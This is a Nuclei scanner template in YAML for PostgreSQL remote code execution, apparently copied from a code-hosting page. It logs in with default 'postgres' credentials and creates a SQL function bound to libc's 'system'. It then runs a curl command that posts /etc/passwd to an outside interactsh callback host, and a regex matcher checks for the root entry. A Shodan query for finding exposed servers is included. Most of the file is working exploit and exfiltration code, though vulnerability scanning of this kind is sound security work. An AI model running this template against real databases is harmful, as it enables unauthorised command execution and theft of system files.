52 lines
1.9 KiB
YAML
52 lines
1.9 KiB
YAML
id: pgsql-extensions-rce
|
|
|
|
info:
|
|
name: PostgreSQL 8.1 Extensions - Remote Code Execution
|
|
author: pussycat0x
|
|
severity: high
|
|
description: |
|
|
PostgreSQL allows for extensions, which are modules providing extra functionality like functions, operators, or types. Starting from version 8.1, these extensions must be compiled with a special header for compatibility with PostgreSQL's extension mechanism.
|
|
reference:
|
|
- https://www.dionach.com/postgresql-9-x-remote-command-execution/
|
|
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#using-libcso6
|
|
- https://hacktricks.boitatech.com.br/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: "product:\"PostgreSQL\""
|
|
tags: postgresql,js,network,rce
|
|
javascript:
|
|
- code: |
|
|
const postgres = require('nuclei/postgres');
|
|
const client = new postgres.PGClient;
|
|
const collab = shurl
|
|
const qry = ["CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;", "SELECT system('curl -X POST -d @/etc/passwd "+ collab +"');"];
|
|
for (const x of qry){
|
|
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, x);
|
|
Export(connected);
|
|
}
|
|
|
|
args:
|
|
Host: "{{Host}}"
|
|
Port: 5432
|
|
User: "{{usernames}}"
|
|
Pass: "{{password}}"
|
|
Db: "{{database}}"
|
|
shurl: http://{{interactsh-url}}
|
|
|
|
payloads:
|
|
usernames:
|
|
- postgres
|
|
database:
|
|
- postgres
|
|
password:
|
|
- postgres
|
|
|
|
attack: clusterbomb
|
|
|
|
matchers:
|
|
- type: regex
|
|
part: interactsh_request
|
|
regex:
|
|
- "root:[x*]:0:0:"
|
|
# digest: 4b0a00483046022100ccc9ea07752141bcfc8fcc5b43173f20c69e8c9431bc9a696641fdadb87de6f2022100f4da0cf0cb1d777e1a2206d08544dd36d8a486e2bce037f7ec40789aa46c4031:922c64590222798bb761d5b6d8e72950 |